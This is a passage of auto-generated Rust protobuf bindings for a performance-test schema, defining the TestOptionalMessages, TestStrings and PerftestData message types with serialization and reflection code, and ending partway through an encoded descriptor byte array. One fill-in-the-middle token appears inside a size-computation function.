ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"messages1",
TestRepeatedMessages::get_messages1,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"messages2",
TestRepeatedMessages::get_messages2,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"messages3",
TestRepeatedMessages::get_messages3,
));
::protobuf::reflect::MessageDescriptor::new::<TestRepeatedMessages>(
"TestRepeatedMessages",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestRepeatedMessages {
fn clear(&mut self) {
self.clear_messages1();
self.clear_messages2();
self.clear_messages3();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestRepeatedMessages {
fn eq(&self, other: &TestRepeatedMessages) -> bool {
self.messages1 == other.messages1 &&
self.messages2 == other.messages2 &&
self.messages3 == other.messages3 &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestRepeatedMessages {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestOptionalMessages {
// message fields
message1: ::protobuf::SingularPtrField<TestOptionalMessages>,
message2: ::protobuf::SingularPtrField<TestOptionalMessages>,
message3: ::protobuf::SingularPtrField<TestOptionalMessages>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestOptionalMessages {
pub fn new() -> TestOptionalMessages {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestOptionalMessages {
static mut instance: ::protobuf::lazy::Lazy<TestOptionalMessages> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestOptionalMessages,
};
unsafe {
instance.get(|| {
TestOptionalMessages {
message1: ::protobuf::SingularPtrField::none(),
message2: ::protobuf::SingularPtrField::none(),
message3: ::protobuf::SingularPtrField::none(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// optional .TestOptionalMessages message1 = 1;
pub fn clear_message1(&mut self) {
self.message1.clear();
}
pub fn has_message1(&self) -> bool {
self.message1.is_some()
}
// Param is passed by value, moved
pub fn set_message1(&mut self, v: TestOptionalMessages) {
self.message1 = ::protobuf::SingularPtrField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_message1<'a>(&'a mut self) -> &'a mut TestOptionalMessages {
if self.message1.is_none() {
self.message1.set_default();
};
self.message1.as_mut().unwrap()
}
// Take field
pub fn take_message1(&mut self) -> TestOptionalMessages {
self.message1.take().unwrap_or_else(|| TestOptionalMessages::new())
}
pub fn get_message1<'a>(&'a self) -> &'a TestOptionalMessages {
self.message1.as_ref().unwrap_or_else(|| TestOptionalMessages::default_instance())
}
// optional .TestOptionalMessages message2 = 2;
pub fn clear_message2(&mut self) {
self.message2.clear();
}
pub fn has_message2(&self) -> bool {
self.message2.is_some()
}
// Param is passed by value, moved
pub fn set_message2(&mut self, v: TestOptionalMessages) {
self.message2 = ::protobuf::SingularPtrField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_message2<'a>(&'a mut self) -> &'a mut TestOptionalMessages {
if self.message2.is_none() {
self.message2.set_default();
};
self.message2.as_mut().unwrap()
}
// Take field
pub fn take_message2(&mut self) -> TestOptionalMessages {
self.message2.take().unwrap_or_else(|| TestOptionalMessages::new())
}
pub fn get_message2<'a>(&'a self) -> &'a TestOptionalMessages {
self.message2.as_ref().unwrap_or_else(|| TestOptionalMessages::default_instance())
}
// optional .TestOptionalMessages message3 = 3;
pub fn clear_message3(&mut self) {
self.message3.clear();
}
pub fn has_message3(&self) -> bool {
self.message3.is_some()
}
// Param is passed by value, moved
pub fn set_message3(&mut self, v: TestOptionalMessages) {
self.message3 = ::protobuf::SingularPtrField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_message3<'a>(&'a mut self) -> &'a mut TestOptionalMessages {
if self.message3.is_none() {
self.message3.set_default();
};
self.message3.as_mut().unwrap()
}
// Take field
pub fn take_message3(&mut self) -> TestOptionalMessages {
self.message3.take().unwrap_or_else(|| TestOptionalMessages::new())
}
pub fn get_message3<'a>(&'a self) -> &'a TestOptionalMessages {
self.message3.as_ref().unwrap_or_else(|| TestOptionalMessages::default_instance())
}
}
impl ::protobuf::Message for TestOptionalMessages {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.message1.set_default();
try!(is.merge_message(tmp))
},
2 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.message2.set_default();
try!(is.merge_message(tmp))
},
3 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.message3.set_default();
try!(is.merge_message(tmp))
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.message1.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.message2.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.message3.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
if let Some(v) = self.message1.as_ref() {
try!(os.write_tag(1, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
if let Some(v) = self.message2.as_ref() {
try!(os.write_tag(2, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
if let Some(v) = self.message3.as_ref() {
try!(os.write_tag(3, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestOptionalMessages>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestOptionalMessages {
fn new() -> TestOptionalMessages {
TestOptionalMessages::new()
}
fn descriptor_static(_: ::std::option::Option<TestOptionalMessages>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_singular_message_accessor(
"message1",
TestOptionalMessages::has_message1,
TestOptionalMessages::get_message1,
));
fields.push(::protobuf::reflect::accessor::make_singular_message_accessor(
"message2",
TestOptionalMessages::has_message2,
TestOptionalMessages::get_message2,
));
fields.push(::protobuf::reflect::accessor::make_singular_message_accessor(
"message3",
TestOptionalMessages::has_message3,
TestOptionalMessages::get_message3,
));
::protobuf::reflect::MessageDescriptor::new::<TestOptionalMessages>(
"TestOptionalMessages",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestOptionalMessages {
fn clear(&mut self) {
self.clear_message1();
self.clear_message2();
self.clear_message3();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestOptionalMessages {
fn eq(&self, other: &TestOptionalMessages) -> bool {
self.message1 == other.message1 &&
self.message2 == other.message2 &&
self.message3 == other.message3 &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestOptionalMessages {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestStrings {
// message fields
s1: ::protobuf::SingularField<::std::string::String>,
s2: ::protobuf::SingularField<::std::string::String>,
s3: ::protobuf::SingularField<::std::string::String>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestStrings {
pub fn new() -> TestStrings {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestStrings {
static mut instance: ::protobuf::lazy::Lazy<TestStrings> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestStrings,
};
unsafe {
instance.get(|| {
TestStrings {
s1: ::protobuf::SingularField::none(),
s2: ::protobuf::SingularField::none(),
s3: ::protobuf::SingularField::none(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// optional string s1 = 1;
pub fn clear_s1(&mut self) {
self.s1.clear();
}
pub fn has_s1(&self) -> bool {
self.s1.is_some()
}
// Param is passed by value, moved
pub fn set_s1(&mut self, v: ::std::string::String) {
self.s1 = ::protobuf::SingularField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_s1<'a>(&'a mut self) -> &'a mut ::std::string::String {
if self.s1.is_none() {
self.s1.set_default();
};
self.s1.as_mut().unwrap()
}
// Take field
pub fn take_s1(&mut self) -> ::std::string::String {
self.s1.take().unwrap_or_else(|| ::std::string::String::new())
}
pub fn get_s1<'a>(&'a self) -> &'a str {
match self.s1.as_ref() {
Some(v) => &v,
None => "",
}
}
// optional string s2 = 2;
pub fn clear_s2(&mut self) {
self.s2.clear();
}
pub fn has_s2(&self) -> bool {
self.s2.is_some()
}
// Param is passed by value, moved
pub fn set_s2(&mut self, v: ::std::string::String) {
self.s2 = ::protobuf::SingularField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_s2<'a>(&'a mut self) -> &'a mut ::std::string::String {
if self.s2.is_none() {
self.s2.set_default();
};
self.s2.as_mut().unwrap()
}
// Take field
pub fn take_s2(&mut self) -> ::std::string::String {
self.s2.take().unwrap_or_else(|| ::std::string::String::new())
}
pub fn get_s2<'a>(&'a self) -> &'a str {
match self.s2.as_ref() {
Some(v) => &v,
None => "",
}
}
// optional string s3 = 3;
pub fn clear_s3(&mut self) {
self.s3.clear();
}
pub fn has_s3(&self) -> bool {
self.s3.is_some()
}
// Param is passed by value, moved
pub fn set_s3(&mut self, v: ::std::string::String) {
self.s3 = ::protobuf::SingularField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_s3<'a>(&'a mut self) -> &'a mut ::std::string::String {
if self.s3.is_none() {
self.s3.set_default();
};
self.s3.as_mut().unwrap()
}
// Take field
pub fn take_s3(&mut self) -> ::std::string::String {
self.s3.take().unwrap_or_else(|| ::std::string::String::new())
}
pub fn get_s3<'a>(&'a self) -> &'a str {
match self.s3.as_ref() {
Some(v) => &v,
None => "",
}
}
}
impl ::protobuf::Message for TestStrings {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.s1.set_default();
try!(is.read_string_into(tmp))
},
2 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.s2.set_default();
try!(is.read_string_into(tmp))
},
3 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.s3.set_default();
try!(is.read_string_into(tmp))
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.s1.iter() {
my_size += ::protobuf::rt::string_size(1, &value);
};
for value in self.s2.iter() {
my_size += ::protobuf::rt::string_size(2, &value);
};
for value in self.s3.iter() {
my_size += ::protobuf::rt::string_size(3, &value);
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);<|fim▁hole|> my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
if let Some(v) = self.s1.as_ref() {
try!(os.write_string(1, &v));
};
if let Some(v) = self.s2.as_ref() {
try!(os.write_string(2, &v));
};
if let Some(v) = self.s3.as_ref() {
try!(os.write_string(3, &v));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestStrings>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestStrings {
fn new() -> TestStrings {
TestStrings::new()
}
fn descriptor_static(_: ::std::option::Option<TestStrings>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_singular_string_accessor(
"s1",
TestStrings::has_s1,
TestStrings::get_s1,
));
fields.push(::protobuf::reflect::accessor::make_singular_string_accessor(
"s2",
TestStrings::has_s2,
TestStrings::get_s2,
));
fields.push(::protobuf::reflect::accessor::make_singular_string_accessor(
"s3",
TestStrings::has_s3,
TestStrings::get_s3,
));
::protobuf::reflect::MessageDescriptor::new::<TestStrings>(
"TestStrings",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestStrings {
fn clear(&mut self) {
self.clear_s1();
self.clear_s2();
self.clear_s3();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestStrings {
fn eq(&self, other: &TestStrings) -> bool {
self.s1 == other.s1 &&
self.s2 == other.s2 &&
self.s3 == other.s3 &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestStrings {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct PerftestData {
// message fields
test1: ::protobuf::RepeatedField<Test1>,
test_repeated_bool: ::protobuf::RepeatedField<TestRepeatedBool>,
test_repeated_messages: ::protobuf::RepeatedField<TestRepeatedMessages>,
test_optional_messages: ::protobuf::RepeatedField<TestOptionalMessages>,
test_strings: ::protobuf::RepeatedField<TestStrings>,
test_repeated_packed_int32: ::protobuf::RepeatedField<TestRepeatedPackedInt32>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl PerftestData {
pub fn new() -> PerftestData {
::std::default::Default::default()
}
pub fn default_instance() -> &'static PerftestData {
static mut instance: ::protobuf::lazy::Lazy<PerftestData> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const PerftestData,
};
unsafe {
instance.get(|| {
PerftestData {
test1: ::protobuf::RepeatedField::new(),
test_repeated_bool: ::protobuf::RepeatedField::new(),
test_repeated_messages: ::protobuf::RepeatedField::new(),
test_optional_messages: ::protobuf::RepeatedField::new(),
test_strings: ::protobuf::RepeatedField::new(),
test_repeated_packed_int32: ::protobuf::RepeatedField::new(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// repeated .Test1 test1 = 1;
pub fn clear_test1(&mut self) {
self.test1.clear();
}
// Param is passed by value, moved
pub fn set_test1(&mut self, v: ::protobuf::RepeatedField<Test1>) {
self.test1 = v;
}
// Mutable pointer to the field.
pub fn mut_test1<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<Test1> {
&mut self.test1
}
// Take field
pub fn take_test1(&mut self) -> ::protobuf::RepeatedField<Test1> {
::std::mem::replace(&mut self.test1, ::protobuf::RepeatedField::new())
}
pub fn get_test1<'a>(&'a self) -> &'a [Test1] {
&self.test1
}
// repeated .TestRepeatedBool test_repeated_bool = 2;
pub fn clear_test_repeated_bool(&mut self) {
self.test_repeated_bool.clear();
}
// Param is passed by value, moved
pub fn set_test_repeated_bool(&mut self, v: ::protobuf::RepeatedField<TestRepeatedBool>) {
self.test_repeated_bool = v;
}
// Mutable pointer to the field.
pub fn mut_test_repeated_bool<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedBool> {
&mut self.test_repeated_bool
}
// Take field
pub fn take_test_repeated_bool(&mut self) -> ::protobuf::RepeatedField<TestRepeatedBool> {
::std::mem::replace(&mut self.test_repeated_bool, ::protobuf::RepeatedField::new())
}
pub fn get_test_repeated_bool<'a>(&'a self) -> &'a [TestRepeatedBool] {
&self.test_repeated_bool
}
// repeated .TestRepeatedMessages test_repeated_messages = 3;
pub fn clear_test_repeated_messages(&mut self) {
self.test_repeated_messages.clear();
}
// Param is passed by value, moved
pub fn set_test_repeated_messages(&mut self, v: ::protobuf::RepeatedField<TestRepeatedMessages>) {
self.test_repeated_messages = v;
}
// Mutable pointer to the field.
pub fn mut_test_repeated_messages<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedMessages> {
&mut self.test_repeated_messages
}
// Take field
pub fn take_test_repeated_messages(&mut self) -> ::protobuf::RepeatedField<TestRepeatedMessages> {
::std::mem::replace(&mut self.test_repeated_messages, ::protobuf::RepeatedField::new())
}
pub fn get_test_repeated_messages<'a>(&'a self) -> &'a [TestRepeatedMessages] {
&self.test_repeated_messages
}
// repeated .TestOptionalMessages test_optional_messages = 4;
pub fn clear_test_optional_messages(&mut self) {
self.test_optional_messages.clear();
}
// Param is passed by value, moved
pub fn set_test_optional_messages(&mut self, v: ::protobuf::RepeatedField<TestOptionalMessages>) {
self.test_optional_messages = v;
}
// Mutable pointer to the field.
pub fn mut_test_optional_messages<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestOptionalMessages> {
&mut self.test_optional_messages
}
// Take field
pub fn take_test_optional_messages(&mut self) -> ::protobuf::RepeatedField<TestOptionalMessages> {
::std::mem::replace(&mut self.test_optional_messages, ::protobuf::RepeatedField::new())
}
pub fn get_test_optional_messages<'a>(&'a self) -> &'a [TestOptionalMessages] {
&self.test_optional_messages
}
// repeated .TestStrings test_strings = 5;
pub fn clear_test_strings(&mut self) {
self.test_strings.clear();
}
// Param is passed by value, moved
pub fn set_test_strings(&mut self, v: ::protobuf::RepeatedField<TestStrings>) {
self.test_strings = v;
}
// Mutable pointer to the field.
pub fn mut_test_strings<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestStrings> {
&mut self.test_strings
}
// Take field
pub fn take_test_strings(&mut self) -> ::protobuf::RepeatedField<TestStrings> {
::std::mem::replace(&mut self.test_strings, ::protobuf::RepeatedField::new())
}
pub fn get_test_strings<'a>(&'a self) -> &'a [TestStrings] {
&self.test_strings
}
// repeated .TestRepeatedPackedInt32 test_repeated_packed_int32 = 6;
pub fn clear_test_repeated_packed_int32(&mut self) {
self.test_repeated_packed_int32.clear();
}
// Param is passed by value, moved
pub fn set_test_repeated_packed_int32(&mut self, v: ::protobuf::RepeatedField<TestRepeatedPackedInt32>) {
self.test_repeated_packed_int32 = v;
}
// Mutable pointer to the field.
pub fn mut_test_repeated_packed_int32<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedPackedInt32> {
&mut self.test_repeated_packed_int32
}
// Take field
pub fn take_test_repeated_packed_int32(&mut self) -> ::protobuf::RepeatedField<TestRepeatedPackedInt32> {
::std::mem::replace(&mut self.test_repeated_packed_int32, ::protobuf::RepeatedField::new())
}
pub fn get_test_repeated_packed_int32<'a>(&'a self) -> &'a [TestRepeatedPackedInt32] {
&self.test_repeated_packed_int32
}
}
impl ::protobuf::Message for PerftestData {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test1));
},
2 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_repeated_bool));
},
3 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_repeated_messages));
},
4 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_optional_messages));
},
5 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_strings));
},
6 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_repeated_packed_int32));
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.test1.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_repeated_bool.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_repeated_messages.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_optional_messages.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_strings.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_repeated_packed_int32.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
for v in self.test1.iter() {
try!(os.write_tag(1, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_repeated_bool.iter() {
try!(os.write_tag(2, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_repeated_messages.iter() {
try!(os.write_tag(3, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_optional_messages.iter() {
try!(os.write_tag(4, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_strings.iter() {
try!(os.write_tag(5, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_repeated_packed_int32.iter() {
try!(os.write_tag(6, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<PerftestData>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for PerftestData {
fn new() -> PerftestData {
PerftestData::new()
}
fn descriptor_static(_: ::std::option::Option<PerftestData>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test1",
PerftestData::get_test1,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_repeated_bool",
PerftestData::get_test_repeated_bool,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_repeated_messages",
PerftestData::get_test_repeated_messages,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_optional_messages",
PerftestData::get_test_optional_messages,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_strings",
PerftestData::get_test_strings,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_repeated_packed_int32",
PerftestData::get_test_repeated_packed_int32,
));
::protobuf::reflect::MessageDescriptor::new::<PerftestData>(
"PerftestData",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for PerftestData {
fn clear(&mut self) {
self.clear_test1();
self.clear_test_repeated_bool();
self.clear_test_repeated_messages();
self.clear_test_optional_messages();
self.clear_test_strings();
self.clear_test_repeated_packed_int32();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for PerftestData {
fn eq(&self, other: &PerftestData) -> bool {
self.test1 == other.test1 &&
self.test_repeated_bool == other.test_repeated_bool &&
self.test_repeated_messages == other.test_repeated_messages &&
self.test_optional_messages == other.test_optional_messages &&
self.test_strings == other.test_strings &&
self.test_repeated_packed_int32 == other.test_repeated_packed_int32 &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for PerftestData {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
static file_descriptor_proto_data: &'static [u8] = &[
0x0a, 0x13, 0x70, 0x65, 0x72, 0x66, 0x74, 0x65, 0x73, 0x74, 0x5f, 0x64, 0x61, 0x74, 0x61, 0x2e,
0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, 0x16, 0x0a, 0x05, 0x54, 0x65, 0x73, 0x74, 0x31, 0x12, 0x0d,
0x0a, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x18, 0x01, 0x20, 0x01, 0x28, 0x05, 0x22, 0x22, 0x0a,
0x10, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x42, 0x6f, 0x6f,
0x6c, 0x12, 0x0e, 0x0a, 0x06, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28,
0x08, 0x22, 0x2d, 0x0a, 0x17, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65,
0x64, 0x50, 0x61, 0x63, 0x6b, 0x65, 0x64, 0x49, 0x6e, 0x74, 0x33, 0x32, 0x12, 0x12, 0x0a, 0x06,
0x76, 0x61, 0x6c, 0x75, 0x65, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28, 0x05, 0x42, 0x02, 0x10, 0x01,
